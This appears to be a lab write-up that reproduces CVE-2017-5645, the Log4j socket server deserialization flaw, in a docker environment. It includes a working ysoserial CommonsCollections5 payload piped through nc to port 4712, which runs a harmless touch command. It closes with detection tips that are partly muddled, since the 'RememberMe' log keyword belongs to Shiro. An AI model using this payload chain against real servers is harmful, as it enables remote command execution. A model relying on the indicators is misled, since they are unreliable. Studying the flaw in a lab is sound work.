Table of contents
2. Vulnerability environment construction
4. Vulnerability traffic characteristics:
1. Vulnerability introduction
CVE-2017-5645 is a deserialization command execution vulnerability in the Apache Log4j server. An attacker can exploit this vulnerability to remotely execute commands by sending crafted requests, thereby compromising the security of the server.
2. Vulnerability environment construction
Enter the vulnerability directory file and start the vulnerability environment: docker-compose up -d
Check the running status of the container: docker ps -a
You can see that after the environment is started successfully, a TCP service will be opened on port 4712. (At this point, the vulnerability environment has been set up. Using docker to build the environment is so simple and easy to operate)
3. Exploiting vulnerabilities
Scan the ports opened by the target: nmap your-ip -p 4712
Here we can see that port 4712 is open, then we use ysoserial to generate the payload, and then send it directly to your-ip:4712 port.
ysoserial introduction:
is a set of utilities and property-oriented programming "little toolchains" found in common Java libraries that, under the right conditions, can be exploited by Java applications that perform unsafe deserialization of objects. (Friends who don’t have the tools can chat with me privately)
We download the packaged jar file to our kali host.
Excuting an order:
java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712
This command creates a success file in the /tmp directory of the target machine. If our command is executed successfully, this file can be found on the target machine.
Go to the target machine to check whether the file is created and whether the command is executed successfully.
View container id: docker ps -a
Execute the command on the target machine and open the website directory: docker exec -it [container id] /bin/bash
Then enter the tmp directory, execute the command: cd tmp, display the files in the directory: ls, you can see the success file, and you can see that touch /tmp/testsuccess was executed successfully.
At this point, the vulnerability has been reproduced.
4. Vulnerability traffic characteristics:
1. Attackers usually exploit Log4j vulnerabilities to execute remote instructions, so the attack traffic may contain malicious code.
2. Attackers can bypass the security of web applications by exploiting Log4j vulnerabilities, so the attack traffic may include modification and access to web applications.
3. Attackers usually try to use malicious code to launch a lot of valuable data that has been collected, so the attack traffic may contain a large number of data packets.
In attack traffic, Log4j vulnerability attacks usually use specific payloads.
To determine whether the attack has been successful, we need to check the application's log files, especially the log files in the logs folder.
Here are some indicators that can help determine whether a vulnerability has been exploited:
When keywords such as "RememberMe" or "Admin" appear in the log file.
Exception information related to remote code execution appears in the log file.
Check your system for unknown network traffic, especially traffic to and from malicious IP addresses.
Check the server's port usage to confirm whether there are any unknown port usage.